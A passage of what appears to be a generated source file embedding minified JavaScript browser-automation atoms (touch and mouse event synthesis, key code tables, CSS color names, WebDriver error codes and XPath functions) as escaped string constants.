"),q=b.targetTouches==b.changedTouches?f:c(b.targetTouches),d=d.createEv"\
"ent(\"MouseEvents\");d.initMouseEvent(this.n,this.r,this.s,e,\n1,0,0,b."\
"clientX,b.clientY,b.ctrlKey,b.altKey,b.shiftKey,b.metaKey,0,b.relatedTa"\
"rget);d.touches=h;d.targetTouches=q;d.changedTouches=f;d.scale=b.scale;"\
"d.rotation=b.rotation;return d};\nvar Ib=new U(\"change\",!0,!1),zb=new"\
" V(\"click\",!0,!0),Ab=new V(\"mousedown\",!0,!0),Jb=new V(\"mousemove"\
"\",!0,!1),yb=new V(\"mouseout\",!0,!0),xb=new V(\"mouseover\",!0,!0),Cb"\
"=new V(\"mouseup\",!0,!0),Hb=new V(\"mousewheel\",!0,!0),Gb=new V(\"Moz"\
"MousePixelScroll\",!0,!0),Kb=new W(\"touchend\",!0,!0),Eb=new W(\"touch"\
"move\",!0,!0),Db=new W(\"touchstart\",!0,!0);function Fb(a,b,c){b=b.cre"\
"ate(a,c);\"isTrusted\"in b||(b.isTrusted=!1);return a.dispatchEvent(b)}"\
";function X(a,b){this.l={};this.e=[];var c=arguments.length;if(1<c){if("\
"c%2)throw Error(\"Uneven number of arguments\");for(var d=0;d<c;d+=2)th"\
"is.set(arguments[d],arguments[d+1])}else if(a){var e;if(a instanceof X)"\
"for(d=Lb(a),Mb(a),e=[],c=0;c<a.e.length;c++)e.push(a.l[a.e[c]]);else{va"\
"r c=[],f=0;for(d in a)c[f++]=d;d=c;c=[];f=0;for(e in a)c[f++]=a[e];e=c}"\
"for(c=0;c<d.length;c++)this.set(d[c],e[c])}}X.prototype.u=0;X.prototype"\
".V=0;function Lb(a){Mb(a);return a.e.concat()}\nfunction Mb(a){if(a.u!="\
"a.e.length){for(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.prototyp"\
"e.hasOwnProperty.call(a.l,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.u!=a.e"\
".length){for(var e={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototype.has"\
"OwnProperty.call(e,d)||(a.e[c++]=d,e[d]=1),b++;a.e.length=c}}X.prototyp"\
"e.get=function(a,b){return Object.prototype.hasOwnProperty.call(this.l,"\
"a)?this.l[a]:b};\nX.prototype.set=function(a,b){Object.prototype.hasOwn"\
"Property.call(this.l,a)||(this.u++,this.e.push(a),this.V++);this.l[a]=b"\
"};var Ob={};function Y(a,b,c){var d=typeof a;(\"object\"==d&&null!=a||"\
"\"function\"==d)&&(a=a.a);a=new Pb(a,b,c);!b||b in Ob&&!c||(Ob[b]={key:"\
"a,shift:!1},c&&(Ob[c]={key:a,shift:!0}));return a}function Pb(a,b,c){th"\
"is.code=a;this.N=b||null;this.ga=c||this.N}Y(8);Y(9);Y(13);var Qb=Y(16)"\
",Rb=Y(17),Sb=Y(18);Y(19);Y(20);Y(27);Y(32,\" \");Y(33);Y(34);Y(35);Y(36"\
");Y(37);Y(38);Y(39);Y(40);Y(44);Y(45);Y(46);Y(48,\"0\",\")\");Y(49,\"1"\
"\",\"!\");Y(50,\"2\",\"@\");Y(51,\"3\",\"#\");Y(52,\"4\",\"$\");Y(53,\""\
"5\",\"%\");Y(54,\"6\",\"^\");Y(55,\"7\",\"&\");\nY(56,\"8\",\"*\");Y(57"\
",\"9\",\"(\");Y(65,\"a\",\"A\");Y(66,\"b\",\"B\");Y(67,\"c\",\"C\");Y(6"\
"8,\"d\",\"D\");Y(69,\"e\",\"E\");Y(70,\"f\",\"F\");Y(71,\"g\",\"G\");Y("\
"72,\"h\",\"H\");Y(73,\"i\",\"I\");Y(74,\"j\",\"J\");Y(75,\"k\",\"K\");Y"\
"(76,\"l\",\"L\");Y(77,\"m\",\"M\");Y(78,\"n\",\"N\");Y(79,\"o\",\"O\");"\
"Y(80,\"p\",\"P\");Y(81,\"q\",\"Q\");Y(82,\"r\",\"R\");Y(83,\"s\",\"S\")"\
";Y(84,\"t\",\"T\");Y(85,\"u\",\"U\");Y(86,\"v\",\"V\");Y(87,\"w\",\"W\""\
");Y(88,\"x\",\"X\");Y(89,\"y\",\"Y\");Y(90,\"z\",\"Z\");var Tb=Y(za?{b:"\
"91,a:91,opera:219}:ya?{b:224,a:91,opera:17}:{b:0,a:91,opera:null});\nY("\
"za?{b:92,a:92,opera:220}:ya?{b:224,a:93,opera:17}:{b:0,a:92,opera:null}"\
");Y(za?{b:93,a:93,opera:0}:ya?{b:0,a:0,opera:16}:{b:93,a:null,opera:0})"\
";Y({b:96,a:96,opera:48},\"0\");Y({b:97,a:97,opera:49},\"1\");Y({b:98,a:"\
"98,opera:50},\"2\");Y({b:99,a:99,opera:51},\"3\");Y({b:100,a:100,opera:"\
"52},\"4\");Y({b:101,a:101,opera:53},\"5\");Y({b:102,a:102,opera:54},\"6"\
"\");Y({b:103,a:103,opera:55},\"7\");Y({b:104,a:104,opera:56},\"8\");Y({"\
"b:105,a:105,opera:57},\"9\");Y({b:106,a:106,opera:u?56:42},\"*\");\nY({"\
"b:107,a:107,opera:u?61:43},\"+\");Y({b:109,a:109,opera:u?109:45},\"-\")"\
";Y({b:110,a:110,opera:u?190:78},\".\");Y({b:111,a:111,opera:u?191:47},"\
"\"/\");Y(144);Y(112);Y(113);Y(114);Y(115);Y(116);Y(117);Y(118);Y(119);Y"\
"(120);Y(121);Y(122);Y(123);Y({b:107,a:187,opera:61},\"=\",\"+\");Y(108,"\
"\",\");Y({b:109,a:189,opera:109},\"-\",\"_\");Y(188,\",\",\"<\");Y(190,"\
"\".\",\">\");Y(191,\"/\",\"?\");Y(192,\"`\",\"~\");Y(219,\"[\",\"{\");Y"\
"(220,\"\\\\\",\"|\");Y(221,\"]\",\"}\");Y({b:59,a:186,opera:59},\";\","\
"\":\");Y(222,\"'\",'\"');var Z=new X;Z.set(1,Qb);Z.set(2,Rb);\nZ.set(4,"\
"Sb);Z.set(8,Tb);(function(a){var b=new X;s(Lb(a),function(c){b.set(a.ge"\
"t(c).code,c)});return b})(Z);function Ub(){tb.call(this);this.j=new v(0"\
",0);this.t=new v(0,0)}r(Ub,tb);g=Ub.prototype;g.w=!1;g.M=!1;g.q=0;g.C=0"\
";g.U=2;g.move=function(a,b,c){this.d()||ub(this,a);a=T(a);this.j.x=b.x+"\
"a.left;this.j.y=b.y+a.top;l(c)&&(this.t.x=c.x+a.left,this.t.y=c.y+a.top"\
");this.d()&&(this.w=!0,Vb(this,Eb))};g.d=function(){return!!this.q};fun"\
"ction Vb(a,b){if(!a.d())throw new t(13,\"Should never fire event when t"\
"ouchscreen is not pressed.\");var c,d;a.C&&(c=a.C,d=a.t);a.v(b,a.q,a.j,"\
"c,d)};function Wb(a,b){this.x=a;this.y=b}r(Wb,v);Wb.prototype.scale=v.p"\
"rototype.scale;Wb.prototype.add=function(a){this.x+=a.x;this.y+=a.y;ret"\
"urn this};function Xb(a){var b;if(\"none\"!=P(a,\"display\"))b=gb(a);el"\
"se{b=a.style;var c=b.display,d=b.visibility,e=b.position;b.visibility="\
"\"hidden\";b.position=\"absolute\";b.display=\"inline\";var f=gb(a);b.d"\
"isplay=c;b.position=e;b.visibility=d;b=f}return 0<b.width&&0<b.height||"\
"!a.offsetParent?b:Xb(a.offsetParent)};function Yb(a,b,c){if(!ib(a,!0))t"\
"hrow new t(11,\"Element is not currently visible and may not be manipul"\
"ated\");var d=w(a).body,e;e=eb(a);var f=eb(d),h,q,n,A;A=O(d,\"borderLef"\
"tWidth\");n=O(d,\"borderRightWidth\");h=O(d,\"borderTopWidth\");q=O(d,"\
"\"borderBottomWidth\");h=new bb(parseFloat(h),parseFloat(n),parseFloat("\
"q),parseFloat(A));q=e.x-f.x-h.left;e=e.y-f.y-h.top;f=d.clientHeight-a.o"\
"ffsetHeight;h=d.scrollLeft;n=d.scrollTop;h+=Math.min(q,Math.max(q-(d.cl"\
"ientWidth-a.offsetWidth),0));n+=Math.min(e,Math.max(e-\nf,0));e=new v(h"\
",n);d.scrollLeft=e.x;d.scrollTop=e.y;b?b=new Wb(b.x,b.y):(b=Xb(a),b=new"\
" Wb(b.width/2,b.height/2));c=c||new Ub;c.move(a,b);if(c.d())throw new t"\
"(13,\"Cannot press touchscreen when already pressed.\");c.w=!1;c.q=c.U+"\
"+;Vb(c,Db);if(!c.d())throw new t(13,\"Cannot release touchscreen when n"\
"ot already pressed.\");Vb(c,Kb);if(!c.w){c.k(Jb,c.j,0);if(c.k(Ab,c.j,0)"\
"&&(a=c.f||c.c,b=La(w(a)),a!=b)){if(b&&p(b.blur)&&!Q(b,\"BODY\"))try{b.b"\
"lur()}catch(wa){throw wa;}p(a.focus)&&a.focus()}if(c.f&&hb(c.c)&&(a=\nc"\
".f,b=lb(c.c),!b||a.multiple)){c.c.selected=!b;if(b=a.multiple){b=0;d=St"\
"ring($a).replace(/^[\\s\\xa0]+|[\\s\\xa0]+$/g,\"\").split(\".\");e=\"28"\
"\".replace(/^[\\s\\xa0]+|[\\s\\xa0]+$/g,\"\").split(\".\");f=Math.max(d"\
".length,e.length);for(q=0;0==b&&q<f;q++){h=d[q]||\"\";n=e[q]||\"\";A=Re"\
"gExp(\"(\\\\d*)(\\\\D*)\",\"g\");var Nb=RegExp(\"(\\\\d*)(\\\\D*)\",\"g"\
"\");do{var F=A.exec(h)||[\"\",\"\",\"\"],G=Nb.exec(n)||[\"\",\"\",\"\"]"\
";if(0==F[0].length&&0==G[0].length)break;b=((0==F[1].length?0:parseInt("\
"F[1],10))<(0==G[1].length?0:parseInt(G[1],10))?-1:(0==\nF[1].length?0:p"\
"arseInt(F[1],10))>(0==G[1].length?0:parseInt(G[1],10))?1:0)||((0==F[2]."\
"length)<(0==G[2].length)?-1:(0==F[2].length)>(0==G[2].length)?1:0)||(F["\
"2]<G[2]?-1:F[2]>G[2]?1:0)}while(0==b)}b=!(0<=b)}b||Fb(a,Ib)}c.k(Cb,c.j,"\
"0);a=c.j;hb(c.c)&&(!c.f&&kb(c.c)&&lb(c.c),c.k(zb,a,0,null,0,!1,void 0))"\
"}Bb={};c.q=0;c.C=0;c.M=!1}var Zb=[\"_\"],$=k;Zb[0]in $||!$.execScript||"\
"$.execScript(\"var \"+Zb[0]);for(var $b;Zb.length&&($b=Zb.shift());)Zb."\
"length||void 0===Yb?$=$[$b]?$[$b]:$[$b]={}:$[$b]=Yb;; return this._.app"\
"ly(null,arguments);}.apply({navigator:typeof window!=undefined?window.n"\
"avigator:null,document:typeof window!=undefined?window.document:null}, "\
"arguments);}"
CLEAR = \
"function(){return function(){function f(a){return function(){return thi"\
"s[a]}}function k(a){return function(){return a}}var l=this;\nfunction a"\
"a(a){var b=typeof a;if(\"object\"==b)if(a){if(a instanceof Array)return"\
"\"array\";if(a instanceof Object)return b;var c=Object.prototype.toStri"\
"ng.call(a);if(\"[object Window]\"==c)return\"object\";if(\"[object Arra"\
"y]\"==c||\"number\"==typeof a.length&&\"undefined\"!=typeof a.splice&&"\
"\"undefined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable("\
"\"splice\"))return\"array\";if(\"[object Function]\"==c||\"undefined\"!"\
"=typeof a.call&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.proper"\
"tyIsEnumerable(\"call\"))return\"function\"}else return\"null\";\nelse "\
"if(\"function\"==b&&\"undefined\"==typeof a.call)return\"object\";retur"\
"n b}function m(a){return\"string\"==typeof a}function n(a){return\"func"\
"tion\"==aa(a)}function ba(a,b){function c(){}c.prototype=b.prototype;a."\
"da=b.prototype;a.prototype=new c};var ca=window;function da(a){return S"\
"tring(a).replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase()})};"\
"var ea=Array.prototype;function p(a,b){for(var c=a.length,d=m(a)?a.spli"\
"t(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function fa(a,b){"\
"if(a.reduce)return a.reduce(b,\"\");var c=\"\";p(a,function(d,e){c=b.ca"\
"ll(void 0,c,d,e,a)});return c}function ga(a,b){for(var c=a.length,d=m(a"\
")?a.split(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return"\
"!0;return!1}\nfunction q(a,b){var c;a:if(m(a))c=m(b)&&1==b.length?a.ind"\
"exOf(b,0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]===b)break a;c="\
"-1}return 0<=c}function ha(a,b,c){return 2>=arguments.length?ea.slice.c"\
"all(a,b):ea.slice.call(a,b,c)};var ia={aliceblue:\"#f0f8ff\",antiquewhi"\
"te:\"#faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",azure:\"#f0ffff"\
"\",beige:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\",blanchedalmon"\
"d:\"#ffebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brown:\"#a52a2a\""\
",burlywood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\"#7fff00\",cho"\
"colate:\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#6495ed\",cornsil"\
"k:\"#fff8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblue:\"#00008b\""\
",darkcyan:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:\"#a9a9a9\",da"\
"rkgreen:\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#bdb76b\",darkma"\
"genta:\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:\"#ff8c00\",dar"\
"korchid:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9967a\",darkseag"\
"reen:\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray:\"#2f4f4f\",da"\
"rkslategrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkviolet:\"#9400d3"\
"\",deeppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:\"#696969\",dim"\
"grey:\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22222\",floralwhi"\
"te:\"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff\",gainsboro:\""\
"#dcdcdc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",goldenrod:\"#daa520"\
"\",gray:\"#808080\",green:\"#008000\",greenyellow:\"#adff2f\",grey:\"#8"\
"08080\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianred:\"#cd5c5c\","\
"indigo:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",lavender:\"#e6e6"\
"fa\",lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lemonchiffon:\"#ff"\
"facd\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",lightcyan:\"#e0ffff"\
"\",lightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3\",lightgreen:\""\
"#90ee90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",lightsalmon:\"#ff"\
"a07a\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87cefa\",lightslateg"\
"ray:\"#778899\",lightslategrey:\"#778899\",lightsteelblue:\"#b0c4de\",l"\
"ightyellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32cd32\",linen:\"#"\
"faf0e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediumaquamarine:\"#66c"\
"daa\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",mediumpurple:\"#9"\
"370db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7b68ee\",mediumsp"\
"ringgreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediumvioletred:\"#c7"\
"1585\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",mistyrose:\"#ffe4"\
"e1\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",navy:\"#000080\",ol"\
"dlace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23\",orange:\"#ffa"\
"500\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegoldenrod:\"#eee8aa"\
"\",palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palevioletred:\"#db7"\
"093\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:\"#cd853f\",pin"\
"k:\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",purple:\"#800080"\
"\",red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#4169e1\",saddlebr"\
"own:\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\",seagreen:\"#2"\
"e8b57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:\"#c0c0c0\",sk"\
"yblue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#708090\",slategrey"\
":\"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",steelblue:\"#4682"\
"b4\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\",tomato:\"#ff6"\
"347\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f5deb3\",white:"\
"\"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yellowgreen:\"#9a"\
"cd32\"};var ja=\"background-color border-top-color border-right-color b"\
"order-bottom-color border-left-color color outline-color\".split(\" \")"\
",ka=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function la(a){if(!ma.te"\
"st(a))throw Error(\"'\"+a+\"' is not a valid hex color\");4==a.length&&"\
"(a=a.replace(ka,\"#$1$1$2$2$3$3\"));return a.toLowerCase()}var ma=/^#(?"\
":[0-9a-f]{3}){1,2}$/i,na=/^(?:rgba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?("\
"\\d{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction oa(a){var b=a.match(na);i"\
"f(b){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b=Number(b[4]);if"\
"(0<=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}r"\
"eturn[]}var pa=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s"\
"?(0|[1-9]\\d{0,2})\\)$/i;function qa(a){var b=a.match(pa);if(b){a=Numbe"\
"r(b[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c"\
"&&0<=b&&255>=b)return[a,c,b]}return[]};function r(a,b){this.code=a;this"\
".state=ra[a]||sa;this.message=b||\"\";var c=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";t"\
"his.name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||"\
"\"\"}ba(r,Error);\nvar sa=\"unknown error\",ra={15:\"element not select"\
"able\",11:\"element not visible\",31:\"ime engine activation failed\",3"\
"0:\"ime not available\",24:\"invalid cookie domain\",29:\"invalid eleme"\
"nt coordinates\",12:\"invalid element state\",32:\"invalid selector\",5"\
"1:\"invalid selector\",52:\"invalid selector\",17:\"javascript error\","\
"405:\"unsupported operation\",34:\"move target out of bounds\",27:\"no "\
"such alert\",7:\"no such element\",8:\"no such frame\",23:\"no such win"\
"dow\",28:\"script timeout\",33:\"session not created\",10:\"stale eleme"\
"nt reference\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie"\
"\",26:\"unexpected alert open\"};ra[13]=sa;ra[9]=\"unknown command\";r."\
"prototype.toString=function(){return this.name+\": \"+this.message};var"\
" t,u,v,ta=l.navigator;v=ta&&ta.platform||\"\";t=-1!=v.indexOf(\"Mac\");"\
"u=-1!=v.indexOf(\"Win\");var w=-1!=v.indexOf(\"Linux\");var x;function "\
"y(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}y.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};y.prototype.ceil=fu"\
"nction(){this.x=Math.ceil(this.x);this.y=Math.ceil(this.y);return this}"\
";y.prototype.floor=function(){this.x=Math.floor(this.x);this.y=Math.flo"\
"or(this.y);return this};y.prototype.round=function(){this.x=Math.round("\
"this.x);this.y=Math.round(this.y);return this};function A(a,b){this.wid"\
"th=a;this.height=b}A.prototype.toString=function(){return\"(\"+this.wid"\
"th+\" x \"+this.height+\")\"};A.prototype.ceil=function(){this.width=Ma"\
"th.ceil(this.width);this.height=Math.ceil(this.height);return this};A.p"\
"rototype.floor=function(){this.width=Math.floor(this.width);this.height"\
"=Math.floor(this.height);return this};A.prototype.round=function(){this"\
".width=Math.round(this.width);this.height=Math.round(this.height);retur"\
"n this};var ua=3;function va(a){for(;a&&1!=a.nodeType;)a=a.previousSibl"\
"ing;return a}function wa(a,b){if(a.contains&&1==b.nodeType)return a==b|"\
"|a.contains(b);if(\"undefined\"!=typeof a.compareDocumentPosition)retur"\
"n a==b||Boolean(a.compareDocumentPosition(b)&16);for(;b&&a!=b;)b=b.pare"\
"ntNode;return b==a}\nfunction xa(a,b){if(a==b)return 0;if(a.compareDocu"\
"mentPosition)return a.compareDocumentPosition(b)&2?1:-1;if(\"sourceInde"\
"x\"in a||a.parentNode&&\"sourceIndex\"in a.parentNode){var c=1==a.nodeT"\
"ype,d=1==b.nodeType;if(c&&d)return a.sourceIndex-b.sourceIndex;var e=a."\
"parentNode,g=b.parentNode;return e==g?ya(a,b):!c&&wa(e,b)?-1*za(a,b):!d"\
"&&wa(g,a)?za(b,a):(c?a.sourceIndex:e.sourceIndex)-(d?b.sourceIndex:g.so"\
"urceIndex)}d=B(a);c=d.createRange();c.selectNode(a);c.collapse(!0);d=d."\
"createRange();d.selectNode(b);\nd.collapse(!0);return c.compareBoundary"\
"Points(l.Range.START_TO_END,d)}function za(a,b){var c=a.parentNode;if(c"\
"==b)return-1;for(var d=b;d.parentNode!=c;)d=d.parentNode;return ya(d,a)"\
"}function ya(a,b){for(var c=b;c=c.previousSibling;)if(c==a)return-1;ret"\
"urn 1}function B(a){return 9==a.nodeType?a:a.ownerDocument||a.document}"\
"function Aa(a,b,c){c||(a=a.parentNode);for(c=0;a;){if(b(a))return a;a=a"\
".parentNode;c++}return null}function Ba(a){try{return a&&a.activeElemen"\
"t}catch(b){}return null}\nfunction C(a){this.I=a||l.document||document}"\
"function Ca(a){var b=a.I;a=b.body;b=b.parentWindow||b.defaultView;retur"\
"n new y(b.pageXOffset||a.scrollLeft,b.pageYOffset||a.scrollTop)}C.proto"\
"type.contains=wa;function D(a){var b=null,c=a.nodeType;1==c&&(b=a.textC"\
"ontent,b=void 0==b||null==b?a.innerText:b,b=void 0==b||null==b?\"\":b);"\
"if(\"string\"!=typeof b)if(9==c||1==c){a=9==c?a.documentElement:a.first"\
"Child;for(var c=0,d=[],b=\"\";a;){do 1!=a.nodeType&&(b+=a.nodeValue),d["\
"c++]=a;while(a=a.firstChild);for(;c&&!(a=d[--c].nextSibling););}}else b"\
"=a.nodeValue;return\"\"+b}\nfunction E(a,b,c){if(null===b)return!0;try{"\
"if(!a.getAttribute)return!1}catch(d){return!1}return null==c?!!a.getAtt"\
"ribute(b):a.getAttribute(b,2)==c}function F(a,b,c,d,e){return Da.call(n"\
"ull,a,b,m(c)?c:null,m(d)?d:null,e||new H)}\nfunction Da(a,b,c,d,e){b.ge"\
"tElementsByName&&d&&\"name\"==c?(b=b.getElementsByName(d),p(b,function("\
"b){a.matches(b)&&e.add(b)})):b.getElementsByClassName&&d&&\"class\"==c?"\
"(b=b.getElementsByClassName(d),p(b,function(b){b.className==d&&a.matche"\
"s(b)&&e.add(b)})):b.getElementsByTagName&&(b=b.getElementsByTagName(a.g"\
"etName()),p(b,function(a){E(a,c,d)&&e.add(a)}));return e}function Ea(a,"\
"b,c,d,e){for(b=b.firstChild;b;b=b.nextSibling)E(b,c,d)&&a.matches(b)&&e"\
".add(b);return e};function H(){this.g=this.f=null;this.n=0}function Fa("\
"a){this.v=a;this.next=this.p=null}H.prototype.unshift=function(a){a=new"\
" Fa(a);a.next=this.f;this.g?this.f.p=a:this.f=this.g=a;this.f=a;this.n+"\
"+};H.prototype.add=function(a){a=new Fa(a);a.p=this.g;this.f?this.g.nex"\
"t=a:this.f=this.g=a;this.g=a;this.n++};function Ga(a){return(a=a.f)?a.v"\
":null}function I(a){return new Ha(a,!1)}function Ha(a,b){this.Z=a;this."\
"r=(this.w=b)?a.g:a.f;this.K=null}\nHa.prototype.next=function(){var a=t"\
"his.r;if(null==a)return null;var b=this.K=a;this.r=this.w?a.p:a.next;re"\
"turn b.v};function J(a,b,c,d,e){b=b.evaluate(d);c=c.evaluate(d);var g;i"\
"f(b instanceof H&&c instanceof H){e=I(b);for(d=e.next();d;d=e.next())fo"\
"r(b=I(c),g=b.next();g;g=b.next())if(a(D(d),D(g)))return!0;return!1}if(b"\
" instanceof H||c instanceof H){b instanceof H?e=b:(e=c,c=b);e=I(e);b=ty"\
"peof c;for(d=e.next();d;d=e.next()){switch(b){case \"number\":d=+D(d);b"\
"reak;case \"boolean\":d=!!D(d);break;case \"string\":d=D(d);break;defau"\
"lt:throw Error(\"Illegal primitive type for comparison.\");}if(a(d,c))r"\
"eturn!0}return!1}return e?\n\"boolean\"==typeof b||\"boolean\"==typeof "\
"c?a(!!b,!!c):\"number\"==typeof b||\"number\"==typeof c?a(+b,+c):a(b,c)"\
":a(+b,+c)}function Ia(a,b,c,d){this.L=a;this.aa=b;this.H=c;this.k=d}Ia."\
"prototype.toString=f(\"L\");var Ja={};function K(a,b,c,d){if(a in Ja)th"\
"row Error(\"Binary operator already created: \"+a);a=new Ia(a,b,c,d);Ja"\
"[a.toString()]=a}K(\"div\",6,1,function(a,b,c){return a.d(c)/b.d(c)});K"\
"(\"mod\",6,1,function(a,b,c){return a.d(c)%b.d(c)});K(\"*\",6,1,functio"\
"n(a,b,c){return a.d(c)*b.d(c)});\nK(\"+\",5,1,function(a,b,c){return a."\
"d(c)+b.d(c)});K(\"-\",5,1,function(a,b,c){return a.d(c)-b.d(c)});K(\"<"\
"\",4,2,function(a,b,c){return J(function(a,b){return a<b},a,b,c)});K(\""\
">\",4,2,function(a,b,c){return J(function(a,b){return a>b},a,b,c)});K("\
"\"<=\",4,2,function(a,b,c){return J(function(a,b){return a<=b},a,b,c)})"\
";K(\">=\",4,2,function(a,b,c){return J(function(a,b){return a>=b},a,b,c"\
")});K(\"=\",3,2,function(a,b,c){return J(function(a,b){return a==b},a,b"\
",c,!0)});\nK(\"!=\",3,2,function(a,b,c){return J(function(a,b){return a"\
"!=b},a,b,c,!0)});K(\"and\",2,2,function(a,b,c){return a.j(c)&&b.j(c)});"\
"K(\"or\",1,2,function(a,b,c){return a.j(c)||b.j(c)});function Ka(a,b,c,"\
"d,e,g,h,z,s){this.o=a;this.H=b;this.Y=c;this.X=d;this.W=e;this.k=g;this"\
".U=h;this.T=void 0!==z?z:h;this.$=!!s}Ka.prototype.toString=f(\"o\");va"\
"r La={};function L(a,b,c,d,e,g,h,z){if(a in La)throw Error(\"Function a"\
"lready created: \"+a+\".\");La[a]=new Ka(a,b,c,d,!1,e,g,h,z)}L(\"boolea"\
"n\",2,!1,!1,function(a,b){return b.j(a)},1);L(\"ceiling\",1,!1,!1,funct"\
"ion(a,b){return Math.ceil(b.d(a))},1);\nL(\"concat\",3,!1,!1,function(a"\
",b){var c=ha(arguments,1);return fa(c,function(b,c){return b+c.c(a)})},"\
"2,null);L(\"contains\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return"\
"-1!=b.indexOf(a)},2);L(\"count\",1,!1,!1,function(a,b){return b.evaluat"\
"e(a).n},1,1,!0);L(\"false\",2,!1,!1,k(!1),0);L(\"floor\",1,!1,!1,functi"\
"on(a,b){return Math.floor(b.d(a))},1);\nL(\"id\",4,!1,!1,function(a,b){"\
"var c=a.h(),d=9==c.nodeType?c:c.ownerDocument,c=b.c(a).split(/\\s+/),e="\
"[];p(c,function(a){(a=d.getElementById(a))&&!q(e,a)&&e.push(a)});e.sort"\
"(xa);var g=new H;p(e,function(a){g.add(a)});return g},1);L(\"lang\",2,!"\
"1,!1,k(!1),1);L(\"last\",1,!0,!1,function(a){if(1!=arguments.length)thr"\
"ow Error(\"Function last expects ()\");return a.Q()},0);L(\"local-name"\
"\",3,!1,!0,function(a,b){var c=b?Ga(b.evaluate(a)):a.h();return c?c.nod"\
"eName.toLowerCase():\"\"},0,1,!0);\nL(\"name\",3,!1,!0,function(a,b){va"\
"r c=b?Ga(b.evaluate(a)):a.h();return c?c.nodeName.toLowerCase():\"\"},0"\
",1,!0);L(\"namespace-uri\",3,!0,!1,k(\"\"),0,1,!0);L(\"normalize-space"\
"\",3,!1,!0,function(a,b){return(b?b.c(a):D(a.h())).replace(/[\\s\\xa0]+"\
"/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,1);L(\"not\",2,!1,!1,function"\
"(a,b){return!b.j(a)},1);L(\"number\",1,!1,!0,function(a,b){return b?b.d"\
"(a):+D(a.h())},0,1);L(\"position\",1,!0,!1,function(a){return a.R()},0)"\
";L(\"round\",1,!1,!1,function(a,b){return Math.round(b.d(a))},1);\nL(\""\
"starts-with\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return 0==b.las"\
"tIndexOf(a,0)},2);L(\"string\",3,!1,!0,function(a,b){return b?b.c(a):D("\
"a.h())},0,1);L(\"string-length\",1,!1,!0,function(a,b){return(b?b.c(a):"\
"D(a.h())).length},0,1);\nL(\"substring\",3,!1,!1,function(a,b,c,d){c=c."\
"d(a);if(isNaN(c)||Infinity==c||-Infinity==c)return\"\";d=d?d.d(a):Infin"\
